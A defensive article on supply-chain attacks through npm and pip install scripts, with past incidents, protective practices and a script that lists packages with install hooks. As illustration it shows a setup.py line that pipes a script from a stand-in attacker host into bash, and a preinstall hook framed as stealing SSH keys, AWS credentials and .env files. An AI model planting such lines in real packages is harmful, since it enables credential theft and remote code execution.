Every time you run npm install or pip install, you're executing code written by strangers on your machine.
Not the library code. The install scripts.
npm packages can run arbitrary JavaScript during npm install via preinstall, install, and postinstall scripts. pip packages can execute setup.py during installation.
Most of the time, this is fine. Sometimes, it's not.
Real Attacks (Not Hypothetical)
event-stream (2018): A popular npm package (2M weekly downloads) was hijacked. The new maintainer added code that stole cryptocurrency wallet keys. It ran during npm install.
ua-parser-js (2021): 7M weekly downloads. Compromised to install crypto miners and credential stealers.
ctx + phpass (2022): Python packages on PyPI modified to steal environment variables (including AWS keys) and send them to a remote server.
@faker-js/faker (2022): The maintainer intentionally sabotaged the package, printing "LIBERTY LIBERTY LIBERTY" in an infinite loop.
These aren't edge cases. Supply chain attacks are the fastest-growing attack vector in software.
What Happens During Install
npm
package.json of a malicious package:
{
  "scripts": {
    "preinstall": "node collect-data.js"
  }
}
collect-data.js could:
- Read your ~/.ssh/ directory
- Read ~/.aws/credentials
- Read .env files
- Send everything to a remote server
- Install a reverse shell
pip
# setup.py of a malicious package
import os
os.system('curl https://evil.com/steal.sh | bash')
This runs with YOUR user permissions during pip install.
How to Protect Yourself
1. Lock Files Are Not Optional
# npm: always commit package-lock.json
npm ci # Uses lockfile, fails if it doesn't match
# Python: use pip-tools or poetry.lock
pip-compile requirements.in # Generates pinned requirements.txt
2. Audit Before Installing
# npm
npm audit
npx socket-security/cli scan
# Python
pip-audit
safety check
3. Use --ignore-scripts (npm)
# Install without running any scripts
npm install --ignore-scripts
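# Then run install scripts only for the packages you trust, by name
# (npm rebuild with no arguments runs them for every package)
npm rebuild <trusted-package>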
4. Check Package Health
Before adding any dependency:
- When was it last updated? Abandoned packages get hijacked
- How many maintainers? Single-maintainer = single point of failure
- What do install scripts do? Check package.json scripts section
- Is it a typosquat? lodash vs 1odash vs lodash-utils
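One way to do the install-script check from the list above, once `npm install --ignore-scripts` has populated node_modules without running anything. This is an added example, not code from the original article; `find_install_scripts` is a hypothetical helper and every package name in the sample tree is constructed.

```python
import json
import tempfile
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall")  # the hooks named in this article

def is_package_dir(pkg_dir):
    """True for node_modules/<name> and node_modules/@scope/<name> only."""
    parent = pkg_dir.parent
    if parent.name.startswith("@"):
        parent = parent.parent
    return parent.name == "node_modules"

def find_install_scripts(node_modules):
    """Map each installed package (path relative to node_modules) to its install hooks."""
    root = Path(node_modules)
    findings = {}
    for manifest in sorted(root.rglob("package.json")):
        if not is_package_dir(manifest.parent):
            continue  # e.g. a package.json inside a package's test fixtures
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest
        scripts = data.get("scripts") if isinstance(data, dict) else None
        if not isinstance(scripts, dict):
            continue
        hooks = {h: scripts[h] for h in HOOKS if h in scripts}
        if hooks:
            findings[manifest.parent.relative_to(root).as_posix()] = hooks
    return findings

def demo():
    """Scan a constructed node_modules tree (all package names are made up)."""
    samples = {
        "quiet-lib": {"scripts": {"test": "node test.js"}},
        "noisy-lib": {"scripts": {"preinstall": "node collect-data.js"}},
        "@acme/native": {"scripts": {"install": "node-gyp rebuild"}},
        "quiet-lib/node_modules/deep": {"scripts": {"postinstall": "node setup.js"}},
        "quiet-lib/test/fixture": {"scripts": {"postinstall": "echo never runs"}},
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "node_modules"
        for rel, manifest in samples.items():
            (root / rel).mkdir(parents=True, exist_ok=True)
            (root / rel / "package.json").write_text(json.dumps(manifest))
        return find_install_scripts(root)

if __name__ == "__main__":
    for pkg, hooks in demo().items():
        print(pkg, hooks)
```

Nested dependencies are reported by their path under node_modules, so two copies of the same package at different depths show up separately.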
5. Use Socket.dev
Socket.dev scans packages for supply chain risks — network access during install, obfuscated code, environment variable access.
Free for open source.
The Bigger Problem
We've built a $4 trillion industry on a system where:
- Anyone can publish a package
- Packages can run arbitrary code during install
- Most developers never audit what they install
- Package names are first-come-first-served (hello, typosquatting)
This isn't sustainable. Tools like Socket.dev, Snyk, and npm's built-in audit are band-aids on a systemic problem.
Minimum Security Checklist
- [ ] Lock files committed and used in CI (npm ci, not npm install)
- [ ] npm audit / pip-audit in CI pipeline
- [ ] Dependabot or Renovate for automated updates
- [ ] No * or latest in version ranges
- [ ] Review new dependencies before adding them